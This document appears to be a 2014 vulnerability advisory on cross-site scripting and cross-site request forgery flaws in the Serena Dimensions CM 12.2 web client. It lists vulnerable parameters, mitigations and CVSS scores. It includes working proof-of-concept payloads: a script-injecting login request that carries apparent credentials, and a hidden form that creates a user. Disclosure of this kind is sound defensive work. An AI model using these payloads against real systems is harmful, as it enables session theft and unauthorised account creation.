Vulnerability Note VU#823452
Serena Dimensions CM 12.2 Build 7.199.0 web client vulnerabilities
Original Release date: 05 Mar 2014 | Last revised: 05 Mar 2014

Overview
Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contains multiple cross-site scripting vulnerabilities.

Description
Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contains multiple cross-site scripting vulnerabilities.
CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) – CVE-2014-0335

#Unauthenticated vulnerable parameters
/dimensions/ [DB_CONN parameter]
/dimensions/ [DB_NAME parameter]
/dimensions/ [DM_HOST parameter]
/dimensions/ [MAN_DB_NAME parameter]

#Authenticated vulnerable parameters
/dimensions/ [framecmd parameter]
/dimensions/ [identifier parameter]
/dimensions/ [identifier parameter]
/dimensions/ [merant.adm.adapters.AdmDialogPropertyMgr parameter]
/dimensions/ [nav_frame parameter]
/dimensions/ [nav_jsp parameter]
/dimensions/ [target_frame parameter]
/dimensions/ [id parameter]
/dimensions/ [type parameter]

Proof-of-Concept:
GET /dimensions/?jsp=login&USER_ID=sa_dmsys&PASSWORD=D%21m3nsions&SYSTEM_DEFINITIONS=0&FORWARD_TARGET=jsp%25253dlogin&MAN_DB_NAME=2f<%2fscript><script>alert(document.cookie)<%2fscript>207&MAN_DB_CONN=&MAN_DM_HOST=&DM_HOST=TEST1&DB_NAME=TEST2&DB_CONN=TEST3&apiConnDetails=&MENU_SET=Default HTTP/1.1

CWE-352: Cross-Site Request Forgery (CSRF) – CVE-2014-0336

Proof-of-Concept:
<html>

<!– CSRF PoC –>

<body>

<form
action="http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects.
User&create=yes" method="POST">
<input type="hidden" name="-AdmAttrNames.user_dept" value="" />
<input type="hidden" name="-AdmAttrNames.id" value="HACKTEST1" />
<input type="hidden" name="USER_CURWORKSET" value="%24GENERIC%3a%24GLOBAL" />

<input type="hidden" name="isUserEdit" value="false" />
<input type="hidden" name="-AdmAttrNames.user_site" value="" />
<input type="hidden" name="-AdmAttrNames.user_phone" value="" />
<input type="hidden" name="AUTOMATIC_LOGIN" value="" />
<input type="hidden" name="-AdmAttrNames.user_group_id" value="" />
<input type="hidden" name="null" value="" />
<input type="hidden" name="DIALOG_MODE" value="MODE%5fCREATE" />
<input type="hidden" name="-AdmAttrNames.user_full_name" value="HACKTEST1" />

<input type="hidden" name="projectPicker" value="%24GENERIC%3a%24GLOBAL" />
<input type="hidden" name="wait_until_loaded" value="" />
<input type="hidden" name="projectPickerUid" value="1" />
<input type="hidden" name="GROUPS_ASSIGNED" value="" />
<input type="hidden" name="-AdmAttrNames.email"
value="ken1%2ecijsouw%40sincerus%2enl" />

<input type="submit" value="Submit request" />
</form>
</body>

Impact
A remote unauthenticated attacker may be able to execute arbitrary script in the context of the end-user’s browser session.

Solution
We are currently unaware of a practical solution to this problem.
Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS attacks since the attack comes as an HTTP request from a legitimate user’s host. Restricting access would prevent an attacker from accessing the interface using stolen credentials from a blocked network location.

Vendor Information (Learn More)

VendorStatusDate NotifiedDate UpdatedSERENA Software IncUnknown-04 Mar 2014If you are a vendor and your product is affected, let
us know.

CVSS Metrics (Learn More)

Group
Score
Vector

Base
7.1
AV:N/AC:M/Au:N/C:C/I:N/A:N

Temporal
5.4
E:U/RL:U/RC:UC

Environmental
1.5
CDP:L/TD:L/CR:ND/IR:ND/AR:ND

References

http://cwe.mitre.org/data/definitions/79.html
http://cwe.mitre.org/data/definitions/352.html
http://www.serena.com/index.php/en/products/featured-products/dimensions-cm/

Credit

Thanks to Ken Cijsouw for reporting this vulnerability.
This document was written by Michael Orlando.

Other Information

CVE IDs:
CVE-2014-0335
CVE-2014-0336

Date Public:
07 Mar 2014

Date First Published:
05 Mar 2014

Date Last Updated:
05 Mar 2014

Document Revision:
7

FeedbackIf you have feedback, comments, or additional information about this vulnerability, please send us email.

Leave a Reply